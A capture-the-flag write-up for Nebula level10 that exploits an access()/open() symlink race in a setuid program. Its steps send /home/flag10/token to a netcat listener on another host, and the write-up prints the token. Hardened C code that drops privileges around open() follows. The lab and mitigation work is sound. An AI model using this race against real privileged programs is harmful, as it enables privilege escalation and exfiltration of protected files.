
Nebula level10 solution

The access() check is done using the calling process's real UID and GID, rather than the effective IDs that are used when the file is actually opened with open(). The idea is to create a symbolic link to a readable file and, once the program has passed the following line, repoint the symbolic link at /home/flag10/token so that the subsequent open() and read() fetch the content of that file.

    if(access(argv[1], R_OK) == 0) {

To do so, you need another host listening for incoming connections on port 18211.

1. Create a symbolic link to a random readable file (e.g. ln -s ~/readable ~/pi3ch)
2. Execute flag10 in the background, i.e. ./flag10 ~/pi3ch OTHERHOSTIPADDRESS &
3. rm ~/pi3ch; ln -s /home/flag10/token ~/pi3ch
4. On the other host, listen for the connection on port 18211, e.g. nc -vvvv -n -l -p 18211
5. Wait; once you receive 615a2ce1-b2b5-4c76-8eed-8aa5c4015c27 (the content of the token file) you are done with this level.
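For comparison, the hardened form of the same open, written here as an added illustration rather than taken from the level's source or the original write-up: instead of checking with access() (real UID) and then opening (effective UID), the effective UID is temporarily set to the real UID so the kernel's permission check inside open() itself is made as the invoking user, and there is no separate check-then-use window to race. Function names are mine.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Opens path for reading with the privileges of the real user.
 * No access() call: the permission decision is taken by open() while the
 * effective UID equals the real UID, so repointing a symlink between a
 * check and the open gains nothing.  Returns an fd, or -1 with errno set;
 * fails closed if privileges cannot be dropped or restored. */
int open_as_real_user(const char *path)
{
    uid_t ruid = getuid(), euid = geteuid();

    if (seteuid(ruid) == -1)            /* could not drop: do not touch the file */
        return -1;
    int fd = open(path, O_RDONLY);
    int saved_errno = errno;
    if (seteuid(euid) == -1) {          /* could not restore: do not carry on half-privileged */
        if (fd >= 0) close(fd);
        return -1;
    }
    errno = saved_errno;
    return fd;
}

/* Reads up to bufsz-1 bytes from path via open_as_real_user() and
 * NUL-terminates buf.  Returns the number of bytes read, or -1 on error. */
ssize_t read_as_real_user(const char *path, char *buf, size_t bufsz)
{
    int fd = open_as_real_user(path);
    if (fd < 0) return -1;
    ssize_t n = read(fd, buf, bufsz - 1);
    close(fd);
    if (n < 0) return -1;
    buf[n] = '\0';
    return n;
}

int main(int argc, char **argv)
{
    char buf[256];
    if (argc != 2) { fprintf(stderr, "usage: %s file\n", argv[0]); return 1; }
    if (read_as_real_user(argv[1], buf, sizeof buf) < 0) { perror(argv[1]); return 1; }
    fputs(buf, stdout);
    return 0;
}
```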

An alternative solution for this problem is posted on http://www.mattandreko.com/2011/12/exploit-exercises-nebula-10.html